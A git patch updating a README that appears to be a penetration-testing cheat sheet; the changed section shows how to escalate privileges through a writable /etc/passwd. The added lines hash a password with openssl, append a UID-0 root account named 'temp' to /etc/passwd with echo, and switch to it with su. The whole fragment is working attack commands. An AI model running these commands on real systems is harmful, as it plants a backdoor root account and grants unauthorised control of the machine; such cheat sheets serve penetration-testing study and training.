From 33903ace2eb9f103ab0b4f1ba507ba279150aa15 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 28 Sep 2022 08:24:06 -0400 Subject: [PATCH] Update README.md --- README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8b1e15b..2ddf566 100644 --- a/README.md +++ b/README.md @@ -1325,10 +1325,12 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null # Creating entry for /etc/passwd openssl passwd -1 -salt ignite pass123 +> $1$ignite$3eTbJm98O9Hz.k1NTdNxe1 -temp:{RESULT}:0:0:root:/root:/bin/bash +echo "temp:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> /etc/passwd -temp:pass123 +su temp +pass pass123 ```